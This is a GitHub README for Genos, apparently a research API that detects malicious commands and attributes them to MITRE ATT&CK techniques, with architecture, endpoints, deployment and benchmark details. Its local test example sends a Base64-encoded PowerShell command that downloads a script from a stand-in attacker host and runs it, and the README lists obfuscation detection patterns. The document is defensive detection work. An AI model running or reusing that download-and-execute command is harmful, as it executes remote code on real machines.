Genos API

Genos is a two-stage neural pipeline for real-time malicious command detection and MITRE ATT&CK technique attribution, served as a REST API over Gunicorn and Flask.

The system was developed as part of an IEEE research programme. This README is derived directly from the source code (engine.py, app.py, gunicorn.conf.py) and reflects the current behaviour of the main branch only.

How the engine works

The core inference logic lives in engine.py. The Flask API in app.py wraps it.

Startup

When the process starts:

python-dotenv loads .env from the working directory.
GenosEngine is constructed once — no hot-reloading of models.
The engine resolves its asset paths in this order for each file:
- absolute path (if given)
- relative to os.getcwd()
- relative to the directory containing engine.py
- each fallback candidate in turn
The specialist label map is loaded from the first file that exists:
- map_path argument passed by the caller
- config/specialist_map.json ← current live path
- models/specialist_map.json
- If none found: built dynamically by reading mitre_id values from the raw MITRE CSV and sorting them
RobertaTokenizer is loaded from microsoft/codebert-base (downloaded on first run, cached by HuggingFace).
Both model checkpoints are loaded with torch.load(..., weights_only=True).
The app calls engine.scan("warmup") before accepting traffic; /health returns {"status": "ok"} once this completes.

Deobfuscation pipeline

Before tokenisation, scan() applies an entropy-aware deobfuscation loop. A command is treated as obfuscated if it matches any of these patterns (case-insensitive regex) or if its Shannon entropy exceeds 5.2 bits:

Pattern	What it catches
`\[char\]`	PowerShell character-code constructions
`base64` / `frombase64`	Inline Base64 references
`reverse\(`	String reversal wrappers
`\+[ ]*'`	String concatenation fragments
`\$[a-z0-9_]{10,}`	Long obfuscated variable names
`\\x[0-9a-f]{2}`	Hex byte escapes

If obfuscated, the engine runs up to 5 deobfuscation passes. Each pass applies, in order:

universal_decoder — decodes the whole string if it matches a bare Base64 regex
decode_embedded_base64 — decodes FromBase64String('...') payloads inline
extract_powershell_payload — extracts the payload from &(builder)(payload) invocation wrappers, including [System.Text.Encoding]::UTF8.GetString(...) variants
deobfuscate_char_constructions — resolves [char]65, (65..67) | % { [char]$_ }, and mixed range+bareword patterns into literal characters
clean_concatenation — collapses "ab" + "cd" and "ab" + bareword forms
pyminusone.deobfuscate(..., lang="powershell") — optional AST-level simplification if pyminusone is installed; silently skipped otherwise
Runs char and concatenation passes again after any AST simplification

The loop terminates early when:

a pass produces no change in the text
the absolute entropy delta between passes is less than 0.01 bits

After the loop, the processed command is lowercased and stripped before tokenisation.

Tokenisation

Uses RobertaTokenizer from microsoft/codebert-base:

max_length: 256 (override with GENOS_MAX_TOKENS env var)
padding: max_length
truncation: enabled
return_tensors: "pt"

Tier 1 — Gatekeeper (3-class neural classifier)

Architecture:

CodeBERT CLS token (768-d)
→ Dropout(0.2)
→ Linear(768, 1024)
→ GELU
→ Dropout(0.2)
→ Linear(1024, 3)

Inference runs under torch.no_grad() and torch.amp.autocast:

CUDA device: float16
CPU device: bfloat16

The model outputs three class probabilities mapped as:

Model index	Internal label	Public label
0	Benign	Benign
1	Malicious	Malicious
2	Context_Dependent	Suspicious

After the neural forward pass, a rule-based routing layer applies over the raw class probabilities. Routing can override the model output based on:

Hard overrides — deterministic pattern matches (e.g. base64-decode piped to shell, reverse shell patterns, credential file reads) that force Malicious regardless of model confidence
Malicious promotion — high-risk behavioral features (e.g. exploit tooling, sensitive sources) that promote weak Benign/Suspicious predictions to Malicious
Malicious cap — commands that are risky but lack definitive attack indicators (e.g. chmod 777, crontab -l) are downgraded from Malicious to Suspicious
Benign safe overrides — high-confidence benign predictions with no suspicious signals pass through directly
Probability routing — remaining cases route by thresholds, margin, suspicious signal count, and feature set

The final public label is one of: Benign, Suspicious, Malicious, or Context_Dependent (requires_context action).

Tier 2 — Specialist (TF-IDF char n-gram + Random Forest)

Tier 2 always runs, regardless of the Tier 1 label. Because it uses a TF-IDF + RF pipeline rather than a neural model, inference takes approximately 90 ms and adds negligible overhead.

Model file: models/specialist_tfidf_char_rf.pkl (scikit-learn pipeline, loaded with joblib).

Input text is built by _build_variant_a_text(), which calls the parser/ module to produce a structured "Variant A" representation of the command:

RAW: <normalised command>
RESIDUAL: <parser-extracted residual tokens>

For obfuscated commands the engine runs Tier 2 twice — once on the original text, once on the decoded payload — and merges results by taking the highest confidence score per MITRE code. The final response caps at 5 codes.

Classes come from config/specialist_map.json (108 MITRE techniques). The pipeline's integer class indices are mapped back to MITRE IDs via _tfidf_idx_to_label.

Engine output schema

GenosEngine.scan() returns:

{
  "label": "Malicious",
  "label_confidence": 0.9981,
  "deobfuscated_cmd": "invoke-expression ...",
  "MITRE_codes": [
    { "code": "T1059", "confidence": 97.43 },
    { "code": "T1021", "confidence": 1.22 },
    { "code": "T1078", "confidence": 0.81 },
    { "code": "T1003", "confidence": 0.48 },
    { "code": "T1087", "confidence": 0.06 }
  ]
}

For obfuscated commands with a decoded payload, two additional fields are populated:

{
  "decoded_payload": "<deobfuscated text>",
  "payload_mitre_codes": [ ... ]
}

For Context_Dependent labels:

{
  "label": "Context_Dependent",
  "action": "requires_context",
  ...
}

Notes:

label is one of: Benign, Suspicious, Malicious, Context_Dependent
label_confidence is a raw probability (0–1) from the engine; app.py's _to_percentage() converts it to a percentage for the HTTP response
MITRE_codes is present on all responses (Tier 2 always runs); it may be empty if no codes exceed the classifier's threshold
deobfuscated_cmd is null when the input was not flagged as obfuscated

Models

Tier 1 uses a CodeBERT neural model. Tier 2 uses a TF-IDF char n-gram + Random Forest sklearn pipeline.

File	Purpose
`models/gatekeeper.pt`	Tier 1 — 3-class CodeBERT gatekeeper (Benign / Suspicious / Malicious)
`models/specialist_tfidf_char_rf.pkl`	Tier 2 — active MITRE attribution model (char n-gram TF-IDF + RF)
`models/specialist_tfidf_rf.pkl`	Tier 2 alternative — word-level TF-IDF + RF variant (not loaded by default)
`config/specialist_map.json`	Maps integer class indices to MITRE technique IDs (108 classes)
`config/gatekeeper_meta.json`	Gatekeeper threshold and training metadata read at startup

Model weights and large artefacts are tracked with Git LFS (.gitattributes). The pkl files are excluded from git entirely via .gitignore due to their size (2.4–2.8 GB); they must be provided out-of-band (e.g. direct copy, shared storage, or LFS if migrated).

API

Served by Gunicorn on 127.0.0.1:6001 by default.

`GET /health`

{ "status": "ok" }

Returns "loading" if the engine warm-up has not yet completed.

`POST /scan` — MongoDB-authenticated

Requires a running MongoDB instance configured via MONGO_URI. API keys are stored in the genos.api_keys collection; usage is tracked in genos.usage.

Request:

{
  "api_key": "YOUR_KEY",
  "command": "net user /domain"
}

The API key is read from the JSON body, not from a header. The command may be plain text or a Base64-encoded string; app.py attempts a full Base64 decode before passing to the engine, falling back to plain text if decode fails.

Response (malicious):

{
  "label": "Malicious",
  "label_confidence": 99.81,
  "MITRE_codes": [
    { "code": "T1087", "confidence": 97.43 },
    { "code": "T1069", "confidence": 1.22 }
  ]
}

Response (benign):

{
  "label": "Benign",
  "label_confidence": 99.99,
  "MITRE_codes": []
}

Error responses:

Status	Meaning
`400`	Missing `api_key` or `command`
`401`	API key not found in MongoDB
`500`	Engine error
`503`	`MONGO_URI` not configured

`POST /scan/internal` — token-gated, no database

Intended for local testing, CI, and benchmark scripts where MongoDB is not required.

Request:

{
  "command": "whoami",
  "internal_token": "optional"
}

internal_token is only enforced when INTERNAL_TEST_TOKEN is set in the environment. Omit the field entirely when the env var is unset.

Response shape is identical to /scan.

Setup and venv

Create a fresh virtual environment

Always use a dedicated venv rather than the system Python or any checked-in environment directory. The project .gitignore already excludes venv/ and my_flask_env/.

cd genos_api
python3 -m venv .venv
source .venv/bin/activate
python -m pip install --upgrade pip setuptools wheel

Use .venv (or any name that .gitignore covers) rather than venv if you want the directory ignored automatically. The existing .gitignore entry covers venv/ literally.

Install dependencies

pip install -r requirements.txt

PyTorch and CUDA: requirements.txt pins the major/minor version of PyTorch but not the CUDA wheel suffix, because the suffix is machine-specific. If you need a specific CUDA build, install it first from the official index before running the above:

# Example: CUDA 12.1 build
pip install torch==2.5.1+cu121 --index-url https://download.pytorch.org/whl/cu121
pip install -r requirements.txt

CPU-only inference works without any CUDA toolkit; the engine auto-detects the device and uses bfloat16 autocast on CPU.

Optional — PowerShell deobfuscation enhancement:

pip install pyminusone

If pyminusone is not installed the engine falls back to its built-in deobfuscation rules silently.

Configure environment

cp .env.example .env
# edit .env with your values

Environment variables

Variable	Used in	Default	Purpose
`MONGO_URI`	`app.py`	—	Connection string for MongoDB; enables `/scan` route
`INTERNAL_TEST_TOKEN`	`app.py`	—	Optional auth token for `/scan/internal`; unenforced if unset
`GENOS_API_BIND`	`gunicorn.conf.py`	`127.0.0.1:6001`	Gunicorn bind address
`GENOS_MAX_TOKENS`	`engine.py`	`256`	Tokeniser max sequence length
`CURRENT_TIME`	`app.py`	`"2026-03-17T00:00:00.000+00:00"`	Timestamp written into Mongo usage records
`GENOS_T1_EFFECTIVE_BATCH`	`trainer1.py`	`256`	Training only: effective batch size
`GENOS_T1_MICRO_BATCH`	`trainer1.py`	`32`	Training only: micro-batch size for gradient accumulation
`GENOS_T1_USE_COMPILE`	`trainer1.py`	`0`	Training only: set `1` to enable `torch.compile()`

Running locally

Start the API

source .venv/bin/activate
gunicorn -c gunicorn.conf.py app:app

The worker loads both CodeBERT models and runs a warm-up pass before accepting traffic. The 300 s Gunicorn timeout covers this load time. On a machine with a GPU and the model weights already cached locally, startup typically takes under 60 s.

Test without MongoDB

curl -s http://127.0.0.1:6001/health

curl -s -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "whoami"}'

curl -s -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwBhAHQAdABhAGMAawBlAHIALgBjAG8AbQAvAG0AYQBsAHcAYQByAGUALgBzAGgAIAB8ACAASQBFAFgA"}'

Reload an already-running instance

bash scripts/ops/reload_api.sh reload   # stop → start → health check
bash scripts/ops/reload_api.sh status   # check /health

The reload script is hardcoded to 127.0.0.1:6001 and activates venv/bin/activate relative to the project root.

Run the engine directly from Python

import sys
sys.path.insert(0, "/path/to/genos_api")

from engine import GenosEngine

engine = GenosEngine()
result = engine.scan("net localgroup administrators")
print(result)

Deployment

Gunicorn configuration (`gunicorn.conf.py`)

Setting	Value	Reason
`bind`	`127.0.0.1:6001`	Loopback only; expose via reverse proxy
`workers`	`1`	One model copy in GPU memory; more workers multiplies VRAM usage
`worker_class`	`sync`	CUDA cannot survive a post-fork environment
`timeout`	`300`	Covers model loading on startup
`preload_app`	not set	Omitted deliberately; pre-loading would fork after CUDA initialisation

Reverse proxy (recommended)

Run Gunicorn on localhost and expose Nginx (or Caddy) publicly. Never bind Gunicorn directly to 0.0.0.0 in production without a reverse proxy.

Minimal Nginx location block:

location /scan {
    proxy_pass http://127.0.0.1:6001;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_read_timeout 60s;
}

systemd unit

[Unit]
Description=Genos API
After=network.target

[Service]
Type=simple
User=genos
WorkingDirectory=/opt/genos_api
EnvironmentFile=/opt/genos_api/.env
ExecStart=/opt/genos_api/.venv/bin/gunicorn -c gunicorn.conf.py app:app
Restart=on-failure
RestartSec=5

[Install]
WantedBy=multi-user.target

Benchmarking and research tooling

IEEE pipeline benchmark (`scripts/benchmark/ieee.py`)

Runs a deployment-aligned evaluation comparing the Genos neural pipeline against a TF-IDF + Random Forest baseline.

cd genos_api
python scripts/benchmark/ieee.py

Metrics reported: Tier 1 AUC, precision, recall, F1; Tier 2 top-1 / top-3 accuracy; macro F1; deobfuscation time; end-to-end latency at multiple benign traffic ratios; ROC curve saved to logs/.

Async stress test (`scripts/benchmark/internal_api_test.py`)

Hits the live API with configurable concurrency. Defaults: 500 requests, 50 % malicious, 20 concurrent workers, 85 % confidence threshold.

# Requires API running on 127.0.0.1:6001
python scripts/benchmark/internal_api_test.py

Results are written to live_stress_report.txt.

Training scripts

Script	Purpose
`scripts/training/trainer1.py`	Train the Tier 1 Gatekeeper binary classifier
`scripts/training/trainer2_hybrid.py`	Train the Tier 2 Specialist MITRE attribution classifier
`scripts/training/trainer_tfidf.py`	Train the TF-IDF baseline classifier
`scripts/data/synthesize_gatekeeper_data.py`	Synthesize gatekeeper training data
`scripts/data/augment_context_sensitivity.py`	Context-sensitivity augmentation
`scripts/data/data_scraper.py`	Raw data collection

Training data lives in data/training/genos_dataset/. Trainers read from the CSVs with the schema command (string), mitre_id (string — "Benign" or a MITRE technique ID such as T1059). Hybrid trainers additionally read from the JSONL files in the same directory.

Repository layout

app.py                              Flask application and route handling
engine.py                           GenosEngine — deobfuscation and two-tier inference
gunicorn.conf.py                    Gunicorn runtime configuration
requirements.txt                    Python dependencies
reqs.txt                            Alias: -r requirements.txt
.env.example                        Environment variable template

config/
  specialist_map.json               Active 108-class MITRE technique → integer label map
  definitive_mitre_map.json         Full MITRE technique reference
  label_map.json                    Human-readable label definitions
  meta/                             Training run metadata and backups (not loaded at runtime)
    gatekeeper_meta.json
    specialist_meta.json
    specialist_residual_a_meta.json
    specialist_residual_b_meta.json
    specialist_map_108.json.bak
    ...

models/
  gatekeeper.pt                     Tier 1 3-class CodeBERT gatekeeper weights (Git LFS)
  specialist_tfidf_char_rf.pkl      Tier 2 active model — char n-gram TF-IDF + RF (not in git, >2 GB)
  specialist_tfidf_rf.pkl           Tier 2 word-level variant (not in git, >2 GB)
  archive/                          Historical and experimental checkpoints (Git LFS)
    gatekeeper_pre_augment.pt
    gatekeeper_pre_context_augment.pt
    specialist_residual_a.pt
    specialist_residual_b.pt

data/training/
  genos_dataset/                    Primary train / val / test splits (CSV)
    gatekeeper_train.csv            Benign + malicious — Gatekeeper training
    gatekeeper_val.csv
    gatekeeper_test.csv
    specialist_train.csv            Malicious commands — Specialist training
    specialist_val.csv
    specialist_test.csv
    context_augment_*.csv           Context-augmented variants
    synthetic_gatekeeper_*.csv      Synthetic benign augmentation splits
    hybrid_specialist_*.jsonl       Hybrid JSONL specialist format
    provenance.json                 Dataset build provenance record
  genos_residual/                   Residual variant datasets (JSONL, variants a/b/c)
  genos_residual_cli/               CLI-specific residual datasets
  genos_residual_expanded/          Expanded residual datasets

parser/                             Command parsing and rule engine module
  parser.py                         Main parser entry point
  rule_engine.py                    Rule-based pre-classification
  deobfuscator.py                   Standalone deobfuscation logic
  semantic_features.py              Feature extraction helpers
  candidate_mask.py                 Candidate MITRE label masking
  residual_text.py                  Residual text extraction
  build_*.py                        Dataset builder scripts
  eval_*.py                         Parser evaluation scripts
  validate_*.py                     Validation harnesses
  parser_gold.jsonl                 Gold-label evaluation set
  parser_schema.json                Parser output schema

scripts/
  training/
    trainer1.py                     Gatekeeper training script
    trainer2_hybrid.py              Specialist hybrid training script
    trainer_tfidf.py                TF-IDF baseline training
    generate_cli_specialist_dataset.py  CLI-specific dataset generation
  data/
    augment_context_sensitivity.py  Context-sensitivity augmentation
    data_scraper.py                 Raw data collection
    synthesize_gatekeeper_data.py   Synthetic gatekeeper data generation
  benchmark/
    ieee.py                         IEEE pipeline benchmark (neural vs TF-IDF baseline)
    internal_api_test.py            Async live API stress test
    mitre_benchmark.py              MITRE technique attribution benchmark
    gatekeeper_3class.py            Three-class gatekeeper evaluation
    benign_fp_test.py               False-positive testing on benign traffic
    e2e_llm.py                      End-to-end LLM comparison benchmark
    tfidf_vs_openai.py              TF-IDF vs OpenAI comparison
    test_variant_a_inference.py     Residual variant A inference test
    3class/                         Three-class benchmark results and corpora
  ops/
    reload_api.sh                   Stop → start → health-check helper
    gunicorn.ctl                    Gunicorn process control file

logs/                               Generated benchmark output (gitignored in production)
  ieee_results_*.json               IEEE benchmark result snapshots
  ieee_roc_curve_*.png              ROC curve plots
  mitre_benchmark.json
  gatekeeper_3class_benchmark.json
  tfidf_specialist_results.json
  tfidf_vs_openai.json
  trainer1_balanced.log
  real_world_benign_results.csv

Security considerations for public deployment

.env is excluded by .gitignore; never commit real secrets
/scan requires a valid API key checked against MongoDB; no unauthenticated inference path exists on that route
/scan/internal bypasses the database and should not be exposed publicly; keep it behind a firewall or protect it with INTERNAL_TEST_TOKEN
Gunicorn is bound to loopback only; the reverse proxy is responsible for TLS termination and rate limiting
The deobfuscation loop is bounded to 5 passes with an entropy-delta early-exit to prevent deobfuscation bombs from causing unbounded processing
Model weights are loaded with weights_only=True to prevent arbitrary code execution via malicious checkpoint files

Citing this work

If you use Genos in your research, please cite the associated IEEE paper.

Name		Name	Last commit message	Last commit date
Latest commit History 54 Commits
config		config
data/training		data/training
logs		logs
models		models
parser		parser
scripts		scripts
.env.example		.env.example
.gitattributes		.gitattributes
.gitignore		.gitignore
README.md		README.md
app.py		app.py
engine.py		engine.py
gunicorn.conf.py		gunicorn.conf.py
reqs.txt		reqs.txt
requirements.txt		requirements.txt

Folders and files

Latest commit

History

Repository files navigation

Genos API

How the engine works

Startup

Deobfuscation pipeline

Tokenisation

Tier 1 — Gatekeeper (3-class neural classifier)

Tier 2 — Specialist (TF-IDF char n-gram + Random Forest)

Engine output schema

Models

API

GET /health

POST /scan — MongoDB-authenticated

POST /scan/internal — token-gated, no database

Setup and venv

Create a fresh virtual environment

Install dependencies

Configure environment

Environment variables

Running locally

Start the API

Test without MongoDB

Reload an already-running instance

Run the engine directly from Python

Deployment

Gunicorn configuration (gunicorn.conf.py)

Reverse proxy (recommended)

systemd unit

Benchmarking and research tooling

IEEE pipeline benchmark (scripts/benchmark/ieee.py)

Async stress test (scripts/benchmark/internal_api_test.py)

Training scripts

Repository layout

Security considerations for public deployment

Citing this work

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

`GET /health`

`POST /scan` — MongoDB-authenticated

`POST /scan/internal` — token-gated, no database

Gunicorn configuration (`gunicorn.conf.py`)

IEEE pipeline benchmark (`scripts/benchmark/ieee.py`)

Async stress test (`scripts/benchmark/internal_api_test.py`)

Packages